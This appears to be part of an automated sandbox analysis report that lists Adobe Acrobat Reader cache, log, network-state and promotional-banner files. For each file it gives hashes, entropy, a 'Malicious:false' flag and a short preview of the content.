                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):294
                                                                                                        Entropy (8bit):5.168486857119082
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:H2gVdvAVq2PKJjq2nKuAl9OmbnIFUt8Y2gVJHuAgZmw+Y2gVvAIkwOKJjq2nKuAR:VVevqFHAahFUt8YVpo/+YV75lFHAaSJ
                                                                                                        MD5:832DC3D669BC50AF3CE0F1E44C88BB83
                                                                                                        SHA1:C54A79E04291318FE8F5508B89E3B6FBAACC3312
                                                                                                        SHA-256:1B08E068D33E1215A8570841FCBDD8D7AEF607E39E289913B7EC50BA003E7F78
                                                                                                        SHA-512:20E73983477E1BF5731BDF06EDBCCC9CBBE5B2E7E0D1E7D6CD7A262C8303A01BA7D642EAF66884FE33ECF9E8BBF42A68D04637FF95B1BAB9F01A6B6B320FB197
                                                                                                        Malicious:false
                                                                                                        Preview:2024/11/08-05:10:44.305 22a0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/08-05:10:44.306 22a0 Recovering log #3.2024/11/08-05:10:44.307 22a0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):338
                                                                                                        Entropy (8bit):5.172686138724114
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:H22Q+q2PKJjq2nKuAl9Ombzo2jMGIFUt8Y2zXdgZmw+Y2zXdQVkwOKJjq2nKuAlx:BvqFHAa8uFUt8j6/+jG5lFHAa8RJ
                                                                                                        MD5:F99C2048CC013ECDBB33DE85569DECA8
                                                                                                        SHA1:E30C586DF2910D3AAEE6E90460136D09CFC9B097
                                                                                                        SHA-256:82D6039B31EE0C565645FA79DC93FD19FE9D7FF3E283FD899FDBF584FAD40B5C
                                                                                                        SHA-512:3746CCF89B9CBC887A3239593AE2BFA6D28AD57DB2AA36FAF372968D1122D57ACD3DA12909CD3C56BC51E252E0A6F9846DA4544EA0A704F343DB8DD010D36462
                                                                                                        Malicious:false
                                                                                                        Preview:2024/11/08-05:10:44.272 22c8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/08-05:10:44.275 22c8 Recovering log #3.2024/11/08-05:10:44.275 22c8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):338
                                                                                                        Entropy (8bit):5.172686138724114
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:H22Q+q2PKJjq2nKuAl9Ombzo2jMGIFUt8Y2zXdgZmw+Y2zXdQVkwOKJjq2nKuAlx:BvqFHAa8uFUt8j6/+jG5lFHAa8RJ
                                                                                                        MD5:F99C2048CC013ECDBB33DE85569DECA8
                                                                                                        SHA1:E30C586DF2910D3AAEE6E90460136D09CFC9B097
                                                                                                        SHA-256:82D6039B31EE0C565645FA79DC93FD19FE9D7FF3E283FD899FDBF584FAD40B5C
                                                                                                        SHA-512:3746CCF89B9CBC887A3239593AE2BFA6D28AD57DB2AA36FAF372968D1122D57ACD3DA12909CD3C56BC51E252E0A6F9846DA4544EA0A704F343DB8DD010D36462
                                                                                                        Malicious:false
                                                                                                        Preview:2024/11/08-05:10:44.272 22c8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/08-05:10:44.275 22c8 Recovering log #3.2024/11/08-05:10:44.275 22c8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\8668ceed-b182-4c55-b36a-0376bc1547de.tmp

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:modified
                                                                                                        Size (bytes):638
                                                                                                        Entropy (8bit):4.93226309755757
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YH/udqcCa53am3RA8sqFLHWsBdOg2HyZcaq3QYiuFP7E4T3y:Y2OaNasRdsGH7dMHX3QYhZ7nby
                                                                                                        MD5:5ED3F1AD5A029DDD374899CC0ADCB0DC
                                                                                                        SHA1:93CC1E3A2ED449C4247A717B5AEB5271CB035B22
                                                                                                        SHA-256:0A765AFD993CD02881B2CEA1E718B5816DAF0DC9B2CE76D7D3B94C5CFEEB45CE
                                                                                                        SHA-512:8DFC2B26DC8AB1839E1ABA7A1CA159F60B819919D9D4594E03434099D341BF18B94BD557C44D5D477DC20E0C7B60BF7CB2A01AAFFF29A59526694E52ED0C6FEC
                                                                                                        Malicious:false
                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://ims-na1.adobelogin.com","supports_spdy":true},{"isolation":[],"server":"https://auth.services.adobe.com","supports_spdy":true},{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375620655760891","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":130710},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.11.30","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):638
                                                                                                        Entropy (8bit):4.93226309755757
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YH/udqcCa53am3RA8sqFLHWsBdOg2HyZcaq3QYiuFP7E4T3y:Y2OaNasRdsGH7dMHX3QYhZ7nby
                                                                                                        MD5:5ED3F1AD5A029DDD374899CC0ADCB0DC
                                                                                                        SHA1:93CC1E3A2ED449C4247A717B5AEB5271CB035B22
                                                                                                        SHA-256:0A765AFD993CD02881B2CEA1E718B5816DAF0DC9B2CE76D7D3B94C5CFEEB45CE
                                                                                                        SHA-512:8DFC2B26DC8AB1839E1ABA7A1CA159F60B819919D9D4594E03434099D341BF18B94BD557C44D5D477DC20E0C7B60BF7CB2A01AAFFF29A59526694E52ED0C6FEC
                                                                                                        Malicious:false
                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://ims-na1.adobelogin.com","supports_spdy":true},{"isolation":[],"server":"https://auth.services.adobe.com","supports_spdy":true},{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375620655760891","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":130710},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.11.30","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7902
                                                                                                        Entropy (8bit):5.262954648826406
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:DA7Q1DHVjW8Mjx5mvQDWr3cOwNaZdgEIGiVl4WmzFllmzBpBrBOA+BQhgI:wmMVVjsKBZV
                                                                                                        MD5:113036EE573DFCC52EC5B1BC47D1ABE6
                                                                                                        SHA1:B2928EEB2BFD68307C77868FB6CEEF791107E67F
                                                                                                        SHA-256:A116D521CDD8D578801A16999529AE00404FAD0A726814BA2C1167FAABA4D637
                                                                                                        SHA-512:C4F8A455F1A8E1C38C0A0E17409602FCCAF89713017C813E4D6D2D68CBF1D4FD690A8885DF9E187A356E33886A78D37528CDF54F2A973AFFC9BE47553BF8452C
                                                                                                        Malicious:false
                                                                                                        Preview:*...#................version.1..namespace-<.(vo................next-map-id.1.Pnamespace-bc8b4a7d_831a_4032_842c_b8b7079c7dcd-https://rna-resource.acrobat.com/.0.<..r................next-map-id.2.Snamespace-654684f0_8f78_4bb8_a837_541f42dffef3-https://rna-v2-resource.acrobat.com/.1;..%r................next-map-id.3.Snamespace-87d29e40_c915_4b9e_9c75_4f190ff8ab1e-https://rna-v2-resource.acrobat.com/.2.O..o................next-map-id.4.Pnamespace-8384e241_5a21_4827_a227_cffab7048d44-https://rna-resource.acrobat.com/.3.*(.^...............Pnamespace-bc8b4a7d_831a_4032_842c_b8b7079c7dcd-https://rna-resource.acrobat.com/..6.r................next-map-id.5.Snamespace-6ee5bc14_ecd9_4b87_99ee_29bca57fcfd8-https://rna-v2-resource.acrobat.com/.4#.#.r................next-map-id.6.Snamespace-f7733574_734b_44e0_ab96_99189a114c8f-https://rna-v2-resource.acrobat.com/.5...o................next-map-id.7.Pnamespace-d4a0c64b_d367_4e54_8180_754b764659c7-https://rna-resource.acrobat.com/.6..<~a..............

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):326
                                                                                                        Entropy (8bit):5.168929687280244
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:H2gRDQQ+q2PKJjq2nKuAl9OmbzNMxIFUt8Y2gRvgZmw+Y2gR+QVkwOKJjq2nKuAo:VRDovqFHAa8jFUt8YRI/+YRp5lFHAa8E
                                                                                                        MD5:E53DB44B7E6B83B0D59950A49DC95433
                                                                                                        SHA1:73AA628069B6337317BDE0D059B2B4BF53141203
                                                                                                        SHA-256:AB132E6B5991F5AB00BE7D79741DB8C1BD0D48AA373344C257D6CE0642CC0ECF
                                                                                                        SHA-512:0EE151DCF9C4B0526FDF86FF2B08FA85A579A874E63D0E93374F1C8704947CB1DC7CCEFBDD4049D180CF0B5F50906EA7FDB011B0A82C847DBEF0394BD87F2A76
                                                                                                        Malicious:false
                                                                                                        Preview:2024/11/08-05:10:44.341 22c8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/08-05:10:44.342 22c8 Recovering log #3.2024/11/08-05:10:44.343 22c8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):326
                                                                                                        Entropy (8bit):5.168929687280244
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:H2gRDQQ+q2PKJjq2nKuAl9OmbzNMxIFUt8Y2gRvgZmw+Y2gR+QVkwOKJjq2nKuAo:VRDovqFHAa8jFUt8YRI/+YRp5lFHAa8E
                                                                                                        MD5:E53DB44B7E6B83B0D59950A49DC95433
                                                                                                        SHA1:73AA628069B6337317BDE0D059B2B4BF53141203
                                                                                                        SHA-256:AB132E6B5991F5AB00BE7D79741DB8C1BD0D48AA373344C257D6CE0642CC0ECF
                                                                                                        SHA-512:0EE151DCF9C4B0526FDF86FF2B08FA85A579A874E63D0E93374F1C8704947CB1DC7CCEFBDD4049D180CF0B5F50906EA7FDB011B0A82C847DBEF0394BD87F2A76
                                                                                                        Malicious:false
                                                                                                        Preview:2024/11/08-05:10:44.341 22c8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/08-05:10:44.342 22c8 Recovering log #3.2024/11/08-05:10:44.343 22c8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):295
                                                                                                        Entropy (8bit):5.326273213858244
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX5KlIFIEsfRHhcgvEm0YcoAvJM3g98kUwPeUkwRe9:YvXKX5iaIEmBRLGMbLUkee9
                                                                                                        MD5:3BC61F6923AC312E2C133ADD29CD6FEF
                                                                                                        SHA1:C7FC21DFF8769C9EDFFF85583A1C524D248730D4
                                                                                                        SHA-256:E1AA590370FDCA9CDB8BD26F0621FDFD91CCE2041875DE538EF13F55A30EFE3C
                                                                                                        SHA-512:62AC97647264D10FD6F2AF61E6B9864DC3E3C02E70FD0DAEC9AA7F6B51F6A21BE8B3B7CC4DB0B5D97245BBA8D8FF66336FC644374B2389EE75523A307CA0A427
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"c85e5333-9f07-401c-a214-a63a3d8c45c3","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1731235383856,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\DC_FirstMile_Home_View_Surface

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):294
                                                                                                        Entropy (8bit):5.2743366184393805
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX5KlIFIEsfRHhcgvEm0YcoAvJfBoTfXpnrPeUkwRe9:YvXKX5iaIEmBRLGWTfXcUkee9
                                                                                                        MD5:772E4F130A3C9500CF7F73FDEC6E7466
                                                                                                        SHA1:A1D4EFCA6CDA04763209CB294AF108E6C522CBF1
                                                                                                        SHA-256:748DB35AE176B50E2F33FEE0A4EE5F58F77929EAC7A552BE16185A0082D8F01D
                                                                                                        SHA-512:4C33AC6C9D90BCA0F62A3AC9158F8CBF200B5F5B0C891A15DC02A3F6668EE65F92F931B4A5AC0F7361307C35E42270DA4DA7594940D5CE779BA75642A8119C82
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"c85e5333-9f07-401c-a214-a63a3d8c45c3","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1731235383856,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\DC_FirstMile_Right_Sec_Surface

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):294
                                                                                                        Entropy (8bit):5.251808867643009
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX5KlIFIEsfRHhcgvEm0YcoAvJfBD2G6UpnrPeUkwRe9:YvXKX5iaIEmBRLGR22cUkee9
                                                                                                        MD5:42FCF9AA6BAF35A4DD607C701B3C414F
                                                                                                        SHA1:3C9FBB60B94E5AA150A35263C8229796928A1DEE
                                                                                                        SHA-256:A2FCAE735ADEC7AFE11DD76BCFC1B66D3CEAFA7F01CE8D8A03C963AFD1125456
                                                                                                        SHA-512:211A1F0B8314C60D4356AB47912237558C63E01C807432DB6279446E85B4EE9E30203F3890F6A688E59361CBCCC32C4754786E85589F0C7D6A847348688E13D2
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"c85e5333-9f07-401c-a214-a63a3d8c45c3","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1731235383856,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\DC_READER_LAUNCH_CARD

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):285
                                                                                                        Entropy (8bit):5.301132620040839
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX5KlIFIEsfRHhcgvEm0YcoAvJfPmwrPeUkwRe9:YvXKX5iaIEmBRLGH56Ukee9
                                                                                                        MD5:9BB4735CA9A52A2E1B9D6D4CDE02B4D1
                                                                                                        SHA1:4537E7BFBE6785BB50237799A1ED74FC6B3A9042
                                                                                                        SHA-256:52BEE349D15123179DCDF582E0FD973756DF5EFD6D1D72ABBA1F6F187A2EB3DC
                                                                                                        SHA-512:50AA97EE1C3D79B0266BD57D42F2FE92885B764F37DC2B5F919ADCBB77626C4668A5BC4E57D92FEA9E6CC39538CABE954D3E8E96E852AF4E27AA17C979C91FC8
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"c85e5333-9f07-401c-a214-a63a3d8c45c3","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1731235383856,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\DC_Reader_Convert_LHP_Banner

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1123
                                                                                                        Entropy (8bit):5.685781068840712
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yv6X5iomBRApLgE9cQx8LennAvzBvkn0RCmK8czOCCS6:Yv7Rehgy6SAFv5Ah8cv/6
                                                                                                        MD5:0E4282FA1A0A6D993BC5B027AA6DFDEA
                                                                                                        SHA1:AADC45E4B9446C57B126E915C41A0596095DC6EB
                                                                                                        SHA-256:F2848BD56103EE2107F93986C7E185C78C74470E71A65EDA0FBF0015ADB99381
                                                                                                        SHA-512:BFCD2CA94C7E8121357F15B437CF9F5E12BE149F101825058F4EFD69D5F5526AAD852F338CDBDA29F3790B971B3FFBB13CEA093ADFD9E78662E323847E1F923D
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"c85e5333-9f07-401c-a214-a63a3d8c45c3","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1731235383856,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\DC_Reader_Disc_LHP_Banner

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1122
                                                                                                        Entropy (8bit):5.678747443095276
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yv6X5iomBRSVLgEwcp06ybnAvz7xHn0RCmK8czOCYHfl8zdBr:Yv7RIFgSNycJUAh8cvYHs
                                                                                                        MD5:BD4C48B8160DC0F60D27B2AA47D308A2
                                                                                                        SHA1:D475342EE9102F27825E4C1FBA85E1CFDB99A788
                                                                                                        SHA-256:AAA25542638201A0A8CA73BA6D5AA0753DC31A7954FDB0B75F2485C1BD32BD58
                                                                                                        SHA-512:CEDCFEEDA05D0FFB816CA06E7871747F449AFB845E6A6D63070C055BE321ED252F0A5A653EDD181D92630D80365595CAC327DD54AD65351A7A261370958174E4
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"c85e5333-9f07-401c-a214-a63a3d8c45c3","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1731235383856,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_0","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"1aad653c-ef44-43f7-be1c-3a2ba2cf2cfc","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuIFBERiBmb3JtcyAmIGFncmVlbWVudHMuIn0sInRjY

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\DC_Reader_Disc_LHP_Retention

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):292
                                                                                                        Entropy (8bit):5.261730990376261
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX5KlIFIEsfRHhcgvEm0YcoAvJfQ1rPeUkwRe9:YvXKX5iaIEmBRLGY16Ukee9
                                                                                                        MD5:55D9278FD8DB08EB9A136A3B767613F9
                                                                                                        SHA1:410D2E76169AC16A62595B8095BCA70C960DEFE1
                                                                                                        SHA-256:67FB2677F64F6CDF21B064A3671ED72B732E53B86BCCACF3DE740D24E62C6C54
                                                                                                        SHA-512:CE40A5B53414A5A83BD87335E43FCCC4D8032FDAA4C87A6B0D8AB0FEB4F3960859610D94C33A7F73E7F2E7E3D424EB0D1476527FEA52769B3EE833A34265B7C2
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"c85e5333-9f07-401c-a214-a63a3d8c45c3","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1731235383856,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\DC_Reader_Edit_LHP_Banner

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1102
                                                                                                        Entropy (8bit):5.6691513012682115
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yv6X5iomBR/2LgErcXWl7y0nAvzIBcSJCBViVr:Yv7RNogH47yfkB5kV6
                                                                                                        MD5:DFFA3BB1FF03C5D66BA7C95BB50D7227
                                                                                                        SHA1:D2700762BC1E6B24556470B4FC28090F99F4BEAE
                                                                                                        SHA-256:D55FE97FE7AE5A2A15628B4831BF4C09109E4AA293EF03FDF940E0C4212A871C
                                                                                                        SHA-512:980A6584B0477C48CE58492E0E1432AEC2A0B5943FC76AF8A25B5A1114E98FD9DD589C7A97DA185517A37EA07C526A2DE26DFFFBF0F9BBF9F282DDD1BA22E3B2
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"c85e5333-9f07-401c-a214-a63a3d8c45c3","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1731235383856,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_1","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"533ab5eb-b236-4889-89a5-ac002261d71e","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkVkaXRQREZSZHJBcHBGdWxsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTRweCIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTJweCIsImZvbnRfc3R5bGUiOiItMSJ9LCJ0aXRsZSI6bnVsbCwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiJ9LCJ0Y2F0SWQiOm51bGx9","da

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\DC_Reader_More_LHP_Banner

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):289
                                                                                                        Entropy (8bit):5.277376146538148
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HX5KlIFIEsfRHhcgvEm0YcoAvJfYdPeUkwRe9:YvXKX5iaIEmBRLGg8Ukee9
                                                                                                        MD5:5126A09B38B485CEB53E716E6A5A7A85
                                                                                                        SHA1:325E6A4A582FD2E9F50AD0B5B672D62B70643D09
                                                                                                        SHA-256:F0B729E556F640F733E005D2C4B29530DF8F0FE8C8029FBE76D57F78B570AA68
                                                                                                        SHA-512:C833FBD1C07B95A0E8BD5911A3A977A79C5FC0328EBD8C5F8D02325E6FFC1643AB69355253AC7CFE56CC23B9A9AA2BE60E15E5704BEC7B53375E6D6686D18950
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"c85e5333-9f07-401c-a214-a63a3d8c45c3","sophiaUUID":"98562364-EA1E-4ACC-A21D-DE8C33F94107"},"encodingScheme":true,"expirationDTS":1731235383856,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\DC_Reader_RHP_Banner

